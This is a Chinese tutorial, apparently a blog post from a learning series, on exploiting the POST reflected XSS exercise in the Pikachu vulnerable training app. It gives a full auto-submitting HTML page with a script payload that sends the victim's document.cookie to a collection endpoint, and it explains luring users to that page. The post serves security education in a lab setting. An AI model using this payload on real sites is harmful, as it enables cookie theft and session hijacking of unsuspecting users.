5.XSS-反射型(post)利用:获取cookie

原理:

文件路径:\pikachu\pkxss\xcookie\post.html

将post.html文件,复制到皮卡丘的根路径下或者根下随意路径即可,并编辑文件

需要修改以下两个地址,第一个地址是将原界面的样子链接过来,让用户认为是原界面,第二个是将cookie从数据库中提取出来的程序(注意和自己的目录相对应)

基于域名配置文件

基于IP地址配置文件

powershell 复制代码
<html>
<head>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://192.168.30.168/pikachu/vul/xss/xsspost/xss_reflected_post.php">
    <input id="xssr_in" type="text" name="message" value=
    "<script>
document.location = 'http://192.168.30.168/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;
	</script>"
	 />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

然后将url:www.pikachu.net/post.html发给用户访问,会直接跳转到post型链接上;

用户误以为是正常网站去访问

在pkxss平台直接获取用户信息

相关推荐
念晚91718 分钟前
Linux各种命令——tac命令,more 命令, less命令,head命令,tail命令,file 命令, stat 命令
linux·运维·服务器·前端·网络·数据库·less
追风的木木1 小时前
vue 组件el-tree添加结构指示线条
前端·javascript·vue.js
nenye2331 小时前
vue-cli 搭建项目,ElementUI的搭建和使用
前端·javascript·vue.js
snows_l1 小时前
基于 elementUI / elementUI plus,实现 主要色(主题色)的一件换色(换肤)
前端·javascript·elementui
Wang's Blog1 小时前
Webpack: 深入理解图像加载原理与最佳实践
前端·webpack
장숙혜2 小时前
解决“Duplicate keys detected: ‘ ‘.This may cause an update error.”问题
前端·vue.js
茶卡盐佑星_2 小时前
VUE的基础指令介绍
前端·vue.js·flutter
Lsx-codeShare2 小时前
webpack 之 splitChunks分包策略
前端·webpack
被迫学习Java2 小时前
前端工程化09-webpack静态的模块化打包工具(未完结)
前端·webpack·node.js
晓得迷路了2 小时前
栗子前端技术周刊第 36 期 - TypeScript 5.5、React-Admin v5、华为“仓颉”发布...
前端·javascript·react.js